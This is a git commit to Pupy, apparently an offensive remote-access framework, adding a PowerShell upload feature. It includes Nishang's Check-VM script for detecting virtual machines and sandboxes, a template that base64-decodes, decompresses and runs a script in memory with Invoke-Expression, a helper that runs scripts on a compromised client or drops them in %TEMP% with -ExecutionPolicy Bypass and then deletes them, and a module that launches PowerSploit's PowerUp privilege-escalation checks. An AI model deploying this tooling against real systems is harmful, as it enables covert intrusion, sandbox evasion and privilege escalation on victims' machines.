adding new feature: powershell upload

This commit is contained in:
Alessandro ZANNI 2016-07-22 15:55:40 +02:00
parent d446596063
commit cb07309a90
6 changed files with 2708 additions and 0 deletions

303
pupy/external/Nishang/Check-VM.ps1 vendored Normal file
View File

@ -0,0 +1,303 @@
function Check-VM
{
<#
.SYNOPSIS
Nishang script which detects whether it is in a known virtual machine.
.DESCRIPTION
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
Xen and QEMU for detecting the environment.
.EXAMPLE
PS > Check-VM
.LINK
http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
https://github.com/samratashok/nishang
.NOTES
The script draws heavily from checkvm.rb post module from msf.
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
#>
[CmdletBinding()] Param()
$ErrorActionPreference = "SilentlyContinue"
#Hyper-V
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
{
$hypervm = $true
}
if (!$hypervm)
{
$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
{
$hypervm = $true
}
}
if ($hypervm)
{
"This is a Hyper-V machine."
}
#VMWARE
$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
{
$vmwarevm = $true
}
if (!$vmwarevm)
{
$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
if ($vmware -match "vmware")
{
$vmwarevm = $true
}
}
if (!$vmwarevm)
{
$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($vmware -match "vmware")
{
$vmwarevm = $true
}
}
if (!$vmwarevm)
{
$vmware = Get-Process
if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
{
$vmwarevm = $true
}
}
if ($vmwarevm)
{
"This is a VMWare machine."
}
#Virtual PC
$vpc = Get-Process
if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
{
$vpcvm = $true
}
if (!$vpcvm)
{
$vpc = Get-Process
if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
{
$vpcvm = $true
}
}
if (!$vpcvm)
{
$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
{
$vpcvm = $true
}
}
if ($vpcvm)
{
"This is a Virtual PC."
}
#Virtual Box
$vb = Get-Process
if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
{
$vbvm = $true
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($vb -match "vbox_")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($vb -match "vbox_")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($vb -match "vbox")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
if ($vb -match "vbox")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
{
$vbvm = $true
}
}
if ($vbvm)
{
"This is a Virtual Box."
}
#Xen
$xen = Get-Process
if ($xen -eq "xenservice.exe")
{
$xenvm = $true
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
{
$xenvm = $true
}
}
if ($xenvm)
{
"This is a Xen Machine."
}
#QEMU
$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($qemu -match "qemu")
{
$qemuvm = $true
}
if (!$qemuvm)
{
$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
if ($qemu -match "qemu")
{
$qemuvm = $true
}
}
if ($qemuvm)
{
"This is a Qemu machine."
}
}

File diff suppressed because one or more lines are too long

20
pupy/modules/check_vm.py Normal file
View File

@ -0,0 +1,20 @@
# -*- coding: UTF8 -*-
from pupylib.PupyModule import *
import os
from modules.lib.windows.powershell_upload import execute_powershell_script
__class_name__="CheckVM"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@config(compat="windows", category="gather")
class CheckVM(PupyModule):
""" check if running on Virtual Machine """
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="CheckVM", description=self.__doc__)
def run(self, args):
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
function = 'Check-VM'
output = execute_powershell_script(self, content, function)
self.success("Output of the script: \n%s" % output)

View File

@ -0,0 +1,10 @@
$base64 = "[BASE64]"
$data = [System.Convert]::FromBase64String($base64)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$t = $sr.readtoend()
Invoke-Expression $t
Invoke-Expression [FUNCTION_NAME]

View File

@ -0,0 +1,54 @@
from rpyc.utils.classic import upload
import base64
import tempfile
import gzip
import StringIO
import subprocess
import os
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "..", ".."))
def execute_powershell_script(module, content, function):
template = open(os.path.join(ROOT, "modules", "lib", "utils", "upload_powershell_script_template.ps1"), 'r').read()
# compress the content of the script to upload
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(content)
# encode the gzip content in base64
encoded = base64.b64encode(out.getvalue())
# replace meta data from the template
template = template.replace('[BASE64]', encoded)
template = template.replace('[FUNCTION_NAME]', function)
output = ""
# execute of the powershell script in memory if the size is lower of the max size
if len(template) < 32710:
module.success("Executing the powershell code on memory")
cmd = []
cmd.append('powershell.exe')
cmd.append('/c')
cmd.append(template)
output = module.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, universal_newlines=True)
else:
tf = tempfile.NamedTemporaryFile()
f = open(tf.name, 'w')
f.write(template)
f.close()
remoteTempFolder = module.client.conn.modules['os.path'].expandvars("%TEMP%")
tfName = tf.name.split(os.sep)
tfName = tfName[len(tfName)-1]
module.success("Uploading powershell code to: %s\%s.ps1" % (remoteTempFolder, tfName))
upload(module.client.conn, tf.name, module.client.conn.modules['os.path'].join(remoteTempFolder, '%s.ps1' % tfName))
module.success("Executing the powershell code")
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s.ps1"%(module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
module.success("Removing the powershell code")
module.client.conn.modules.subprocess.check_output("cmd.exe del %s.ps1" % (module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
return output

26
pupy/modules/powerup.py Normal file
View File

@ -0,0 +1,26 @@
# -*- coding: UTF8 -*-
from pupylib.PupyModule import *
import os
from modules.lib.windows.powershell_upload import execute_powershell_script
__class_name__="PowerUp"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@config(compat="windows", category="admin")
class PowerUp(PupyModule):
""" trying common Windows privilege escalation methods"""
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="PowerUp", description=self.__doc__)
def run(self, args):
content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read()
# launch all PowerUp checks
function = 'Invoke-AllChecks'
output = execute_powershell_script(self, content, function)
# parse output depending on the PowerUp output
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
self.success("Output of the script: \n%s" % output)